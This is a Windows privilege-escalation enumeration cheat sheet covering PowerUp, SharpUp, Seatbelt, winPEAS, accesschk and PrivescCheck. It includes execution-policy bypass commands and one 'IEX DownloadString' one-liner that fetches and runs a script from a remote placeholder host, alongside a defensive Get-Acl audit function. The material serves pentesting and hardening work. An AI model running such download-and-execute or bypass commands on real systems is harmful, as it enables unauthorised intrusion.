Automated enumeration script

PowerUp

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

To run PowerUp, start a PowerShell session and use dot sourcing to load the script:

CMD> powershell -exec bypass

PS> . .\PowerUp.ps1

PS> Invoke-AllChecks

# Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.

OR

C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"

SharpUp (if PowerShell is not available)

PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations.

# Code: https://github.com/GhostPack/SharpUp

# Pre-Compiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe

To run SharpUp, start a command prompt and run the executable:

.\SharpUp.exe

Seatbelt

Seatbelt is an enumeration tool. It contains a number of enumeration checks.

It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation.

# Code: https://github.com/GhostPack/Seatbelt

# Pre-Compiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe

To run all checks and filter out unimportant results:

.\Seatbelt.exe all

To run specific check(s):

.\Seatbelt.exe <check> <check>

winPEAS

winPEAS is a very powerful tool that not only actively hunts for privilege escalation misconfigurations, but highlights them for the user in the results.

# Code: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Before running, we need to add a registry key (it enables ANSI colour output in the console, which winPEAS uses to highlight findings) and then reopen the command prompt:

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Run all checks while avoiding time-consuming searches:

.\winPEASany.exe quiet cmd fast

Run specific check categories:

.\winPEASany.exe quiet cmd systeminfo

accesschk.exe

AccessChk is an old but still trustworthy tool for checking user access control rights.

You can use it to check whether a user or group has access to files, directories, services, and registry keys.

The downside is that more recent versions of the program spawn a GUI "accept EULA" popup window. When working from the command line, we have to use an older version which still has the /accepteula command line option.

https://xor.cat/assets/other/Accesschk.zip

Always do this first

accesschk.exe /accepteula

# Always do this first, otherwise the later commands hang on the EULA prompt.

Find all weak file permissions per drive:

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Find all weak folder permissions per drive:

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\
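For hosts where dropping accesschk is not an option, the same check can be done natively with Get-Acl. The following is an added example written from a hardening-review angle (it is not from the original page and not Sysinternals code); the $Root path and the principal list are assumptions the auditor adjusts.

```powershell
# Added example: native PowerShell equivalent of "accesschk -uwqs <principal> <path>",
# reporting files/folders where low-privileged principals hold write-class rights.
# Assumption: run in an elevated session on the host being audited.
function Find-WeakAcl {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Root,
        # Principals that should never be able to modify system or service paths.
        [string[]] $Principals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    )
    $R = [System.Security.AccessControl.FileSystemRights]
    # Rights that allow replacing content or changing the ACL itself.
    $writeMask = $R::WriteData -bor $R::AppendData -bor $R::Delete -bor
                 $R::ChangePermissions -bor $R::TakeOwnership -bor
                 $R::Modify -bor $R::FullControl

    Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue |
      ForEach-Object {
        $item = $_
        # Unreadable ACLs (access denied) are skipped, like accesschk -u does.
        try { $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction Stop } catch { return }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Principals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # inherited ACEs point at a misconfigured parent
            }
        }
      }
}

# Usage: audit a tree and summarise findings per principal for remediation.
Find-WeakAcl -Root 'C:\Program Files' | Group-Object Principal | Select-Object Name, Count
```

Findings with Inherited set to True are usually fixed once on the parent folder rather than per file.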

PrivescCheck

This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# From cmd

PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\Temp\> . .\PrivescCheck.ps1; Invoke-PrivescCheck
# From powershell

C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
# By default, the scope is limited to vulnerability discovery, but you can get a lot more information with the -Extended option
